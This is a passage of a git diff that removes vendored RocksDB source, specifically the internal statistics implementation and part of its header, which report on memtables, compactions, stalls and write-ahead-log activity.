-  if (!s.ok()) {
-    return false;
-  }
-  *value = tp->ToString();
-  return true;
-}
-
-bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* db,
-                                               Version* version) {
-  *value = cfd_->imm()->NumNotFlushed();
-  return true;
-}
-
-bool InternalStats::HandleNumImmutableMemTableFlushed(uint64_t* value,
-                                                      DBImpl* db,
-                                                      Version* version) {
-  *value = cfd_->imm()->NumFlushed();
-  return true;
-}
-
-bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* db,
-                                               Version* version) {
-  // Return number of mem tables that are ready to flush (made immutable)
-  *value = (cfd_->imm()->IsFlushPending() ? 1 : 0);
-  return true;
-}
-
-bool InternalStats::HandleNumRunningFlushes(uint64_t* value, DBImpl* db,
-                                            Version* version) {
-  *value = db->num_running_flushes();
-  return true;
-}
-
-bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* db,
-                                            Version* version) {
-  // 1 if the system already determines at least one compaction is needed.
-  // 0 otherwise,
-  const auto* vstorage = cfd_->current()->storage_info();
-  *value = (cfd_->compaction_picker()->NeedsCompaction(vstorage) ? 1 : 0);
-  return true;
-}
-
-bool InternalStats::HandleNumRunningCompactions(uint64_t* value, DBImpl* db,
-                                                Version* version) {
-  *value = db->num_running_compactions_;
-  return true;
-}
-
-bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* db,
-                                           Version* version) {
-  // Accumulated number of  errors in background flushes or compactions.
-  *value = GetBackgroundErrorCount();
-  return true;
-}
-
-bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* db,
-                                                Version* version) {
-  // Current size of the active memtable
-  *value = cfd_->mem()->ApproximateMemoryUsage();
-  return true;
-}
-
-bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* db,
-                                              Version* version) {
-  // Current size of the active memtable + immutable memtables
-  *value = cfd_->mem()->ApproximateMemoryUsage() +
-           cfd_->imm()->ApproximateUnflushedMemTablesMemoryUsage();
-  return true;
-}
-
-bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* db,
-                                           Version* version) {
-  *value = cfd_->mem()->ApproximateMemoryUsage() +
-           cfd_->imm()->ApproximateMemoryUsage();
-  return true;
-}
-
-bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, DBImpl* db,
-                                                   Version* version) {
-  // Current number of entires in the active memtable
-  *value = cfd_->mem()->num_entries();
-  return true;
-}
-
-bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, DBImpl* db,
-                                                 Version* version) {
-  // Current number of entries in the immutable memtables
-  *value = cfd_->imm()->current()->GetTotalNumEntries();
-  return true;
-}
-
-bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, DBImpl* db,
-                                                   Version* version) {
-  // Current number of entires in the active memtable
-  *value = cfd_->mem()->num_deletes();
-  return true;
-}
-
-bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, DBImpl* db,
-                                                 Version* version) {
-  // Current number of entries in the immutable memtables
-  *value = cfd_->imm()->current()->GetTotalNumDeletes();
-  return true;
-}
-
-bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* db,
-                                          Version* version) {
-  // Estimate number of entries in the column family:
-  // Use estimated entries in tables + total entries in memtables.
-  const auto* vstorage = cfd_->current()->storage_info();
-  uint64_t estimate_keys = cfd_->mem()->num_entries() +
-                           cfd_->imm()->current()->GetTotalNumEntries() +
-                           vstorage->GetEstimatedActiveKeys();
-  uint64_t estimate_deletes =
-      cfd_->mem()->num_deletes() + cfd_->imm()->current()->GetTotalNumDeletes();
-  *value = estimate_keys > estimate_deletes * 2
-               ? estimate_keys - (estimate_deletes * 2)
-               : 0;
-  return true;
-}
-
-bool InternalStats::HandleNumSnapshots(uint64_t* value, DBImpl* db,
-                                       Version* version) {
-  *value = db->snapshots().count();
-  return true;
-}
-
-bool InternalStats::HandleOldestSnapshotTime(uint64_t* value, DBImpl* db,
-                                             Version* version) {
-  *value = static_cast<uint64_t>(db->snapshots().GetOldestSnapshotTime());
-  return true;
-}
-
-bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* db,
-                                          Version* version) {
-  *value = cfd_->GetNumLiveVersions();
-  return true;
-}
-
-bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, DBImpl* db,
-                                                    Version* version) {
-  *value = cfd_->GetSuperVersionNumber();
-  return true;
-}
-
-bool InternalStats::HandleIsFileDeletionsEnabled(uint64_t* value, DBImpl* db,
-                                                 Version* version) {
-  *value = db->IsFileDeletionsEnabled();
-  return true;
-}
-
-bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* db,
-                                    Version* version) {
-  const auto* vstorage = cfd_->current()->storage_info();
-  *value = vstorage->base_level();
-  return true;
-}
-
-bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* db,
-                                            Version* version) {
-  *value = cfd_->GetTotalSstFilesSize();
-  return true;
-}
-
-bool InternalStats::HandleEstimatePendingCompactionBytes(uint64_t* value,
-                                                         DBImpl* db,
-                                                         Version* version) {
-  const auto* vstorage = cfd_->current()->storage_info();
-  *value = vstorage->estimated_compaction_needed_bytes();
-  return true;
-}
-
-bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, DBImpl* db,
-                                                  Version* version) {
-  *value = (version == nullptr) ? 0 : version->GetMemoryUsageByTableReaders();
-  return true;
-}
-
-bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* db,
-                                               Version* version) {
-  const auto* vstorage = cfd_->current()->storage_info();
-  *value = vstorage->EstimateLiveDataSize();
-  return true;
-}
-
-bool InternalStats::HandleMinLogNumberToKeep(uint64_t* value, DBImpl* db,
-                                             Version* version) {
-  *value = db->MinLogNumberToKeep();
-  return true;
-}
-
-bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db,
-                                                 Version* version) {
-  const WriteController& wc = db->write_controller();
-  if (!wc.NeedsDelay()) {
-    *value = 0;
-  } else {
-    *value = wc.delayed_write_rate();
-  }
-  return true;
-}
-
-bool InternalStats::HandleIsWriteStopped(uint64_t* value, DBImpl* db,
-                                         Version* version) {
-  *value = db->write_controller().IsStopped() ? 1 : 0;
-  return true;
-}
-
-bool InternalStats::HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* /*db*/,
-                                                Version* /*version*/) {
-  // TODO(yiwu): The property is currently available for fifo compaction
-  // with allow_compaction = false. This is because we don't propagate
-  // oldest_key_time on compaction.
-  if (cfd_->ioptions()->compaction_style != kCompactionStyleFIFO ||
-      cfd_->ioptions()->compaction_options_fifo.allow_compaction) {
-    return false;
-  }
-
-  TablePropertiesCollection collection;
-  auto s = cfd_->current()->GetPropertiesOfAllTables(&collection);
-  if (!s.ok()) {
-    return false;
-  }
-  *value = std::numeric_limits<uint64_t>::max();
-  for (auto& p : collection) {
-    *value = std::min(*value, p.second->oldest_key_time);
-    if (*value == 0) {
-      break;
-    }
-  }
-  if (*value > 0) {
-    *value = std::min({cfd_->mem()->ApproximateOldestKeyTime(),
-                       cfd_->imm()->ApproximateOldestKeyTime(), *value});
-  }
-  return *value > 0 && *value < std::numeric_limits<uint64_t>::max();
-}
-
-void InternalStats::DumpDBStats(std::string* value) {
-  char buf[1000];
-  // DB-level stats, only available from default column family
-  double seconds_up = (env_->NowMicros() - started_at_ + 1) / kMicrosInSec;
-  double interval_seconds_up = seconds_up - db_stats_snapshot_.seconds_up;
-  snprintf(buf, sizeof(buf),
-           "\n** DB Stats **\nUptime(secs): %.1f total, %.1f interval\n",
-           seconds_up, interval_seconds_up);
-  value->append(buf);
-  // Cumulative
-  uint64_t user_bytes_written = GetDBStats(InternalStats::BYTES_WRITTEN);
-  uint64_t num_keys_written = GetDBStats(InternalStats::NUMBER_KEYS_WRITTEN);
-  uint64_t write_other = GetDBStats(InternalStats::WRITE_DONE_BY_OTHER);
-  uint64_t write_self = GetDBStats(InternalStats::WRITE_DONE_BY_SELF);
-  uint64_t wal_bytes = GetDBStats(InternalStats::WAL_FILE_BYTES);
-  uint64_t wal_synced = GetDBStats(InternalStats::WAL_FILE_SYNCED);
-  uint64_t write_with_wal = GetDBStats(InternalStats::WRITE_WITH_WAL);
-  uint64_t write_stall_micros = GetDBStats(InternalStats::WRITE_STALL_MICROS);
-
-  const int kHumanMicrosLen = 32;
-  char human_micros[kHumanMicrosLen];
-
-  // Data
-  // writes: total number of write requests.
-  // keys: total number of key updates issued by all the write requests
-  // commit groups: number of group commits issued to the DB. Each group can
-  //                contain one or more writes.
-  // so writes/keys is the average number of put in multi-put or put
-  // writes/groups is the average group commit size.
-  //
-  // The format is the same for interval stats.
-  snprintf(buf, sizeof(buf),
-           "Cumulative writes: %s writes, %s keys, %s commit groups, "
-           "%.1f writes per commit group, ingest: %.2f GB, %.2f MB/s\n",
-           NumberToHumanString(write_other + write_self).c_str(),
-           NumberToHumanString(num_keys_written).c_str(),
-           NumberToHumanString(write_self).c_str(),
-           (write_other + write_self) / static_cast<double>(write_self + 1),
-           user_bytes_written / kGB, user_bytes_written / kMB / seconds_up);
-  value->append(buf);
-  // WAL
-  snprintf(buf, sizeof(buf),
-           "Cumulative WAL: %s writes, %s syncs, "
-           "%.2f writes per sync, written: %.2f GB, %.2f MB/s\n",
-           NumberToHumanString(write_with_wal).c_str(),
-           NumberToHumanString(wal_synced).c_str(),
-           write_with_wal / static_cast<double>(wal_synced + 1),
-           wal_bytes / kGB, wal_bytes / kMB / seconds_up);
-  value->append(buf);
-  // Stall
-  AppendHumanMicros(write_stall_micros, human_micros, kHumanMicrosLen, true);
-  snprintf(buf, sizeof(buf),
-           "Cumulative stall: %s, %.1f percent\n",
-           human_micros,
-           // 10000 = divide by 1M to get secs, then multiply by 100 for pct
-           write_stall_micros / 10000.0 / std::max(seconds_up, 0.001));
-  value->append(buf);
-
-  // Interval
-  uint64_t interval_write_other = write_other - db_stats_snapshot_.write_other;
-  uint64_t interval_write_self = write_self - db_stats_snapshot_.write_self;
-  uint64_t interval_num_keys_written =
-      num_keys_written - db_stats_snapshot_.num_keys_written;
-  snprintf(buf, sizeof(buf),
-           "Interval writes: %s writes, %s keys, %s commit groups, "
-           "%.1f writes per commit group, ingest: %.2f MB, %.2f MB/s\n",
-           NumberToHumanString(
-               interval_write_other + interval_write_self).c_str(),
-           NumberToHumanString(interval_num_keys_written).c_str(),
-           NumberToHumanString(interval_write_self).c_str(),
-           static_cast<double>(interval_write_other + interval_write_self) /
-               (interval_write_self + 1),
-           (user_bytes_written - db_stats_snapshot_.ingest_bytes) / kMB,
-           (user_bytes_written - db_stats_snapshot_.ingest_bytes) / kMB /
-               std::max(interval_seconds_up, 0.001)),
-  value->append(buf);
-
-  uint64_t interval_write_with_wal =
-      write_with_wal - db_stats_snapshot_.write_with_wal;
-  uint64_t interval_wal_synced = wal_synced - db_stats_snapshot_.wal_synced;
-  uint64_t interval_wal_bytes = wal_bytes - db_stats_snapshot_.wal_bytes;
-
-  snprintf(buf, sizeof(buf),
-           "Interval WAL: %s writes, %s syncs, "
-           "%.2f writes per sync, written: %.2f MB, %.2f MB/s\n",
-           NumberToHumanString(interval_write_with_wal).c_str(),
-           NumberToHumanString(interval_wal_synced).c_str(),
-           interval_write_with_wal /
-              static_cast<double>(interval_wal_synced + 1),
-           interval_wal_bytes / kGB,
-           interval_wal_bytes / kMB / std::max(interval_seconds_up, 0.001));
-  value->append(buf);
-
-  // Stall
-  AppendHumanMicros(
-      write_stall_micros - db_stats_snapshot_.write_stall_micros,
-      human_micros, kHumanMicrosLen, true);
-  snprintf(buf, sizeof(buf),
-           "Interval stall: %s, %.1f percent\n",
-           human_micros,
-           // 10000 = divide by 1M to get secs, then multiply by 100 for pct
-           (write_stall_micros - db_stats_snapshot_.write_stall_micros) /
-               10000.0 / std::max(interval_seconds_up, 0.001));
-  value->append(buf);
-
-  db_stats_snapshot_.seconds_up = seconds_up;
-  db_stats_snapshot_.ingest_bytes = user_bytes_written;
-  db_stats_snapshot_.write_other = write_other;
-  db_stats_snapshot_.write_self = write_self;
-  db_stats_snapshot_.num_keys_written = num_keys_written;
-  db_stats_snapshot_.wal_bytes = wal_bytes;
-  db_stats_snapshot_.wal_synced = wal_synced;
-  db_stats_snapshot_.write_with_wal = write_with_wal;
-  db_stats_snapshot_.write_stall_micros = write_stall_micros;
-}
-
-/**
- * Dump Compaction Level stats to a map of stat name to value in double.
- * The level in stat name is represented with a prefix "Lx" where "x"
- * is the level number. A special level "Sum" represents the sum of a stat
- * for all levels.
- */
-void InternalStats::DumpCFMapStats(std::map<std::string, double>* cf_stats) {
-  CompactionStats compaction_stats_sum(0);
-  std::map<int, std::map<LevelStatType, double>> levels_stats;
-  DumpCFMapStats(&levels_stats, &compaction_stats_sum);
-  for (auto const& level_ent : levels_stats) {
-    auto level_str =
-        level_ent.first == -1 ? "Sum" : "L" + ToString(level_ent.first);
-    for (auto const& stat_ent : level_ent.second) {
-      auto stat_type = stat_ent.first;
-      auto key_str =
-          level_str + "." +
-          InternalStats::compaction_level_stats.at(stat_type).property_name;
-      (*cf_stats)[key_str] = stat_ent.second;
-    }
-  }
-}
-
-void InternalStats::DumpCFMapStats(
-    std::map<int, std::map<LevelStatType, double>>* levels_stats,
-    CompactionStats* compaction_stats_sum) {
-  const VersionStorageInfo* vstorage = cfd_->current()->storage_info();
-
-  int num_levels_to_check =
-      (cfd_->ioptions()->compaction_style != kCompactionStyleFIFO)
-          ? vstorage->num_levels() - 1
-          : 1;
-
-  // Compaction scores are sorted based on its value. Restore them to the
-  // level order
-  std::vector<double> compaction_score(number_levels_, 0);
-  for (int i = 0; i < num_levels_to_check; ++i) {
-    compaction_score[vstorage->CompactionScoreLevel(i)] =
-        vstorage->CompactionScore(i);
-  }
-  // Count # of files being compacted for each level
-  std::vector<int> files_being_compacted(number_levels_, 0);
-  for (int level = 0; level < number_levels_; ++level) {
-    for (auto* f : vstorage->LevelFiles(level)) {
-      if (f->being_compacted) {
-        ++files_being_compacted[level];
-      }
-    }
-  }
-
-  int total_files = 0;
-  int total_files_being_compacted = 0;
-  double total_file_size = 0;
-  uint64_t flush_ingest = cf_stats_value_[BYTES_FLUSHED];
-  uint64_t add_file_ingest = cf_stats_value_[BYTES_INGESTED_ADD_FILE];
-  uint64_t curr_ingest = flush_ingest + add_file_ingest;
-  for (int level = 0; level < number_levels_; level++) {
-    int files = vstorage->NumLevelFiles(level);
-    total_files += files;
-    total_files_being_compacted += files_being_compacted[level];
-    if (comp_stats_[level].micros > 0 || files > 0) {
-      compaction_stats_sum->Add(comp_stats_[level]);
-      total_file_size += vstorage->NumLevelBytes(level);
-      uint64_t input_bytes;
-      if (level == 0) {
-        input_bytes = curr_ingest;
-      } else {
-        input_bytes = comp_stats_[level].bytes_read_non_output_levels;
-      }
-      double w_amp =
-          (input_bytes == 0)
-              ? 0.0
-              : static_cast<double>(comp_stats_[level].bytes_written) /
-                    input_bytes;
-      std::map<LevelStatType, double> level_stats;
-      PrepareLevelStats(&level_stats, files, files_being_compacted[level],
-                        static_cast<double>(vstorage->NumLevelBytes(level)),
-                        compaction_score[level], w_amp, comp_stats_[level]);
-      (*levels_stats)[level] = level_stats;
-    }
-  }
-  // Cumulative summary
-  double w_amp = compaction_stats_sum->bytes_written /
-                 static_cast<double>(curr_ingest + 1);
-  // Stats summary across levels
-  std::map<LevelStatType, double> sum_stats;
-  PrepareLevelStats(&sum_stats, total_files, total_files_being_compacted,
-                    total_file_size, 0, w_amp, *compaction_stats_sum);
-  (*levels_stats)[-1] = sum_stats;  //  -1 is for the Sum level
-}
-
-void InternalStats::DumpCFStats(std::string* value) {
-  DumpCFStatsNoFileHistogram(value);
-  DumpCFFileHistogram(value);
-}
-
-void InternalStats::DumpCFStatsNoFileHistogram(std::string* value) {
-  char buf[2000];
-  // Per-ColumnFamily stats
-  PrintLevelStatsHeader(buf, sizeof(buf), cfd_->GetName());
-  value->append(buf);
-
-  // Print stats for each level
-  std::map<int, std::map<LevelStatType, double>> levels_stats;
-  CompactionStats compaction_stats_sum(0);
-  DumpCFMapStats(&levels_stats, &compaction_stats_sum);
-  for (int l = 0; l < number_levels_; ++l) {
-    if (levels_stats.find(l) != levels_stats.end()) {
-      PrintLevelStats(buf, sizeof(buf), "L" + ToString(l), levels_stats[l]);
-      value->append(buf);
-    }
-  }
-
-  // Print sum of level stats
-  PrintLevelStats(buf, sizeof(buf), "Sum", levels_stats[-1]);
-  value->append(buf);
-
-  uint64_t flush_ingest = cf_stats_value_[BYTES_FLUSHED];
-  uint64_t add_file_ingest = cf_stats_value_[BYTES_INGESTED_ADD_FILE];
-  uint64_t ingest_files_addfile = cf_stats_value_[INGESTED_NUM_FILES_TOTAL];
-  uint64_t ingest_l0_files_addfile =
-      cf_stats_value_[INGESTED_LEVEL0_NUM_FILES_TOTAL];
-  uint64_t ingest_keys_addfile = cf_stats_value_[INGESTED_NUM_KEYS_TOTAL];
-  // Cumulative summary
-  uint64_t total_stall_count =
-      cf_stats_count_[LEVEL0_SLOWDOWN_TOTAL] +
-      cf_stats_count_[LEVEL0_NUM_FILES_TOTAL] +
-      cf_stats_count_[SOFT_PENDING_COMPACTION_BYTES_LIMIT] +
-      cf_stats_count_[HARD_PENDING_COMPACTION_BYTES_LIMIT] +
-      cf_stats_count_[MEMTABLE_COMPACTION] + cf_stats_count_[MEMTABLE_SLOWDOWN];
-  // Interval summary
-  uint64_t interval_flush_ingest =
-      flush_ingest - cf_stats_snapshot_.ingest_bytes_flush;
-  uint64_t interval_add_file_inget =
-      add_file_ingest - cf_stats_snapshot_.ingest_bytes_addfile;
-  uint64_t interval_ingest =
-      interval_flush_ingest + interval_add_file_inget + 1;
-  CompactionStats interval_stats(compaction_stats_sum);
-  interval_stats.Subtract(cf_stats_snapshot_.comp_stats);
-  double w_amp =
-      interval_stats.bytes_written / static_cast<double>(interval_ingest);
-  PrintLevelStats(buf, sizeof(buf), "Int", 0, 0, 0, 0, w_amp, interval_stats);
-  value->append(buf);
-
-  double seconds_up = (env_->NowMicros() - started_at_ + 1) / kMicrosInSec;
-  double interval_seconds_up = seconds_up - cf_stats_snapshot_.seconds_up;
-  snprintf(buf, sizeof(buf), "Uptime(secs): %.1f total, %.1f interval\n",
-           seconds_up, interval_seconds_up);
-  value->append(buf);
-  snprintf(buf, sizeof(buf), "Flush(GB): cumulative %.3f, interval %.3f\n",
-           flush_ingest / kGB, interval_flush_ingest / kGB);
-  value->append(buf);
-  snprintf(buf, sizeof(buf), "AddFile(GB): cumulative %.3f, interval %.3f\n",
-           add_file_ingest / kGB, interval_add_file_inget / kGB);
-  value->append(buf);
-
-  uint64_t interval_ingest_files_addfile =
-      ingest_files_addfile - cf_stats_snapshot_.ingest_files_addfile;
-  snprintf(buf, sizeof(buf), "AddFile(Total Files): cumulative %" PRIu64
-                             ", interval %" PRIu64 "\n",
-           ingest_files_addfile, interval_ingest_files_addfile);
-  value->append(buf);
-
-  uint64_t interval_ingest_l0_files_addfile =
-      ingest_l0_files_addfile - cf_stats_snapshot_.ingest_l0_files_addfile;
-  snprintf(buf, sizeof(buf),
-           "AddFile(L0 Files): cumulative %" PRIu64 ", interval %" PRIu64 "\n",
-           ingest_l0_files_addfile, interval_ingest_l0_files_addfile);
-  value->append(buf);
-
-  uint64_t interval_ingest_keys_addfile =
-      ingest_keys_addfile - cf_stats_snapshot_.ingest_keys_addfile;
-  snprintf(buf, sizeof(buf),
-           "AddFile(Keys): cumulative %" PRIu64 ", interval %" PRIu64 "\n",
-           ingest_keys_addfile, interval_ingest_keys_addfile);
-  value->append(buf);
-
-  // Compact
-  uint64_t compact_bytes_read = 0;
-  uint64_t compact_bytes_write = 0;
-  uint64_t compact_micros = 0;
-  for (int level = 0; level < number_levels_; level++) {
-    compact_bytes_read += comp_stats_[level].bytes_read_output_level +
-                          comp_stats_[level].bytes_read_non_output_levels;
-    compact_bytes_write += comp_stats_[level].bytes_written;
-    compact_micros += comp_stats_[level].micros;
-  }
-
-  snprintf(buf, sizeof(buf),
-           "Cumulative compaction: %.2f GB write, %.2f MB/s write, "
-           "%.2f GB read, %.2f MB/s read, %.1f seconds\n",
-           compact_bytes_write / kGB, compact_bytes_write / kMB / seconds_up,
-           compact_bytes_read / kGB, compact_bytes_read / kMB / seconds_up,
-           compact_micros / kMicrosInSec);
-  value->append(buf);
-
-  // Compaction interval
-  uint64_t interval_compact_bytes_write =
-      compact_bytes_write - cf_stats_snapshot_.compact_bytes_write;
-  uint64_t interval_compact_bytes_read =
-      compact_bytes_read - cf_stats_snapshot_.compact_bytes_read;
-  uint64_t interval_compact_micros =
-      compact_micros - cf_stats_snapshot_.compact_micros;
-
-  snprintf(
-      buf, sizeof(buf),
-      "Interval compaction: %.2f GB write, %.2f MB/s write, "
-      "%.2f GB read, %.2f MB/s read, %.1f seconds\n",
-      interval_compact_bytes_write / kGB,
-      interval_compact_bytes_write / kMB / std::max(interval_seconds_up, 0.001),
-      interval_compact_bytes_read / kGB,
-      interval_compact_bytes_read / kMB / std::max(interval_seconds_up, 0.001),
-      interval_compact_micros / kMicrosInSec);
-  value->append(buf);
-  cf_stats_snapshot_.compact_bytes_write = compact_bytes_write;
-  cf_stats_snapshot_.compact_bytes_read = compact_bytes_read;
-  cf_stats_snapshot_.compact_micros = compact_micros;
-
-  snprintf(buf, sizeof(buf), "Stalls(count): %" PRIu64
-                             " level0_slowdown, "
-                             "%" PRIu64
-                             " level0_slowdown_with_compaction, "
-                             "%" PRIu64
-                             " level0_numfiles, "
-                             "%" PRIu64
-                             " level0_numfiles_with_compaction, "
-                             "%" PRIu64
-                             " stop for pending_compaction_bytes, "
-                             "%" PRIu64
-                             " slowdown for pending_compaction_bytes, "
-                             "%" PRIu64
-                             " memtable_compaction, "
-                             "%" PRIu64
-                             " memtable_slowdown, "
-                             "interval %" PRIu64 " total count\n",
-           cf_stats_count_[LEVEL0_SLOWDOWN_TOTAL],
-           cf_stats_count_[LEVEL0_SLOWDOWN_WITH_COMPACTION],
-           cf_stats_count_[LEVEL0_NUM_FILES_TOTAL],
-           cf_stats_count_[LEVEL0_NUM_FILES_WITH_COMPACTION],
-           cf_stats_count_[HARD_PENDING_COMPACTION_BYTES_LIMIT],
-           cf_stats_count_[SOFT_PENDING_COMPACTION_BYTES_LIMIT],
-           cf_stats_count_[MEMTABLE_COMPACTION],
-           cf_stats_count_[MEMTABLE_SLOWDOWN],
-           total_stall_count - cf_stats_snapshot_.stall_count);
-  value->append(buf);
-
-  cf_stats_snapshot_.seconds_up = seconds_up;
-  cf_stats_snapshot_.ingest_bytes_flush = flush_ingest;
-  cf_stats_snapshot_.ingest_bytes_addfile = add_file_ingest;
-  cf_stats_snapshot_.ingest_files_addfile = ingest_files_addfile;
-  cf_stats_snapshot_.ingest_l0_files_addfile = ingest_l0_files_addfile;
-  cf_stats_snapshot_.ingest_keys_addfile = ingest_keys_addfile;
-  cf_stats_snapshot_.comp_stats = compaction_stats_sum;
-  cf_stats_snapshot_.stall_count = total_stall_count;
-}
-
-void InternalStats::DumpCFFileHistogram(std::string* value) {
-  char buf[2000];
-  snprintf(buf, sizeof(buf),
-           "\n** File Read Latency Histogram By Level [%s] **\n",
-           cfd_->GetName().c_str());
-  value->append(buf);
-
-  for (int level = 0; level < number_levels_; level++) {
-    if (!file_read_latency_[level].Empty()) {
-      char buf2[5000];
-      snprintf(buf2, sizeof(buf2),
-               "** Level %d read latency histogram (micros):\n%s\n", level,
-               file_read_latency_[level].ToString().c_str());
-      value->append(buf2);
-    }
-  }
-}
-
-#else
-
-const DBPropertyInfo* GetPropertyInfo(const Slice& property) { return nullptr; }
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/internal_stats.h b/thirdparty/rocksdb/db/internal_stats.h
deleted file mode 100644
index a0b8a90..0000000
--- a/thirdparty/rocksdb/db/internal_stats.h
+++ /dev/null
@@ -1,590 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-
-#pragma once
-#include <map>
-#include <string>
-#include <vector>
-
-#include "db/version_set.h"
-
-class ColumnFamilyData;
-
-namespace rocksdb {
-
-class MemTableList;
-class DBImpl;
-
-// Config for retrieving a property's value.
-struct DBPropertyInfo {
-  bool need_out_of_mutex;
-
-  // gcc had an internal error for initializing union of pointer-to-member-
-  // functions. Workaround is to populate exactly one of the following function
-  // pointers with a non-nullptr value.
-
-  // @param value Value-result argument for storing the property's string value
-  // @param suffix Argument portion of the property. For example, suffix would
-  //      be "5" for the property "rocksdb.num-files-at-level5". So far, only
-  //      certain string properties take an argument.
-  bool (InternalStats::*handle_string)(std::string* value, Slice suffix);
-
-  // @param value Value-result argument for storing the property's uint64 value
-  // @param db Many of the int properties rely on DBImpl methods.
-  // @param version Version is needed in case the property is retrieved without
-  //      holding db mutex, which is only supported for int properties.
-  bool (InternalStats::*handle_int)(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool (InternalStats::*handle_map)(
-      std::map<std::string, double>* compaction_stats);
-};
-
-extern const DBPropertyInfo* GetPropertyInfo(const Slice& property);
-
-#ifndef ROCKSDB_LITE
-#undef SCORE
-enum class LevelStatType {
-  INVALID = 0,
-  NUM_FILES,
-  COMPACTED_FILES,
-  SIZE_BYTES,
-  SCORE,
-  READ_GB,
-  RN_GB,
-  RNP1_GB,
-  WRITE_GB,
-  W_NEW_GB,
-  MOVED_GB,
-  WRITE_AMP,
-  READ_MBPS,
-  WRITE_MBPS,
-  COMP_SEC,
-  COMP_COUNT,
-  AVG_SEC,
-  KEY_IN,
-  KEY_DROP,
-  TOTAL  // total number of types
-};
-
-struct LevelStat {
-  // This what will be L?.property_name in the flat map returned to the user
-  std::string property_name;
-  // This will be what we will print in the header in the cli
-  std::string header_name;
-};
-
-class InternalStats {
- public:
-  static const std::map<LevelStatType, LevelStat> compaction_level_stats;
-
-  enum InternalCFStatsType {
-    LEVEL0_SLOWDOWN_TOTAL,
-    LEVEL0_SLOWDOWN_WITH_COMPACTION,
-    MEMTABLE_COMPACTION,
-    MEMTABLE_SLOWDOWN,
-    LEVEL0_NUM_FILES_TOTAL,
-    LEVEL0_NUM_FILES_WITH_COMPACTION,
-    SOFT_PENDING_COMPACTION_BYTES_LIMIT,
-    HARD_PENDING_COMPACTION_BYTES_LIMIT,
-    WRITE_STALLS_ENUM_MAX,
-    BYTES_FLUSHED,
-    BYTES_INGESTED_ADD_FILE,
-    INGESTED_NUM_FILES_TOTAL,
-    INGESTED_LEVEL0_NUM_FILES_TOTAL,
-    INGESTED_NUM_KEYS_TOTAL,
-    INTERNAL_CF_STATS_ENUM_MAX,
-  };
-
-  enum InternalDBStatsType {
-    WAL_FILE_BYTES,
-    WAL_FILE_SYNCED,
-    BYTES_WRITTEN,
-    NUMBER_KEYS_WRITTEN,
-    WRITE_DONE_BY_OTHER,
-    WRITE_DONE_BY_SELF,
-    WRITE_WITH_WAL,
-    WRITE_STALL_MICROS,
-    INTERNAL_DB_STATS_ENUM_MAX,
-  };
-
-  InternalStats(int num_levels, Env* env, ColumnFamilyData* cfd)
-      : db_stats_{},
-        cf_stats_value_{},
-        cf_stats_count_{},
-        comp_stats_(num_levels),
-        file_read_latency_(num_levels),
-        bg_error_count_(0),
-        number_levels_(num_levels),
-        env_(env),
-        cfd_(cfd),
-        started_at_(env->NowMicros()) {}
-
-  // Per level compaction stats.  comp_stats_[level] stores the stats for
-  // compactions that produced data for the specified "level".
-  struct CompactionStats {
-    uint64_t micros;
-
-    // The number of bytes read from all non-output levels
-    uint64_t bytes_read_non_output_levels;
-
-    // The number of bytes read from the compaction output level.
-    uint64_t bytes_read_output_level;
-
-    // Total number of bytes written during compaction
-    uint64_t bytes_written;
-
-    // Total number of bytes moved to the output level
-    uint64_t bytes_moved;
-
-    // The number of compaction input files in all non-output levels.
-    int num_input_files_in_non_output_levels;
-
-    // The number of compaction input files in the output level.
-    int num_input_files_in_output_level;
-
-    // The number of compaction output files.
-    int num_output_files;
-
-    // Total incoming entries during compaction between levels N and N+1
-    uint64_t num_input_records;
-
-    // Accumulated diff number of entries
-    // (num input entries - num output entires) for compaction  levels N and N+1
-    uint64_t num_dropped_records;
-
-    // Number of compactions done
-    int count;
-
-    explicit CompactionStats(int _count = 0)
-        : micros(0),
-          bytes_read_non_output_levels(0),
-          bytes_read_output_level(0),
-          bytes_written(0),
-          bytes_moved(0),
-          num_input_files_in_non_output_levels(0),
-          num_input_files_in_output_level(0),
-          num_output_files(0),
-          num_input_records(0),
-          num_dropped_records(0),
-          count(_count) {}
-
-    explicit CompactionStats(const CompactionStats& c)
-        : micros(c.micros),
-          bytes_read_non_output_levels(c.bytes_read_non_output_levels),
-          bytes_read_output_level(c.bytes_read_output_level),
-          bytes_written(c.bytes_written),
-          bytes_moved(c.bytes_moved),
-          num_input_files_in_non_output_levels(
-              c.num_input_files_in_non_output_levels),
-          num_input_files_in_output_level(
-              c.num_input_files_in_output_level),
-          num_output_files(c.num_output_files),
-          num_input_records(c.num_input_records),
-          num_dropped_records(c.num_dropped_records),
-          count(c.count) {}
-
-    void Clear() {
-      this->micros = 0;
-      this->bytes_read_non_output_levels = 0;
-      this->bytes_read_output_level = 0;
-      this->bytes_written = 0;
-      this->bytes_moved = 0;
-      this->num_input_files_in_non_output_levels = 0;
-      this->num_input_files_in_output_level = 0;
-      this->num_output_files = 0;
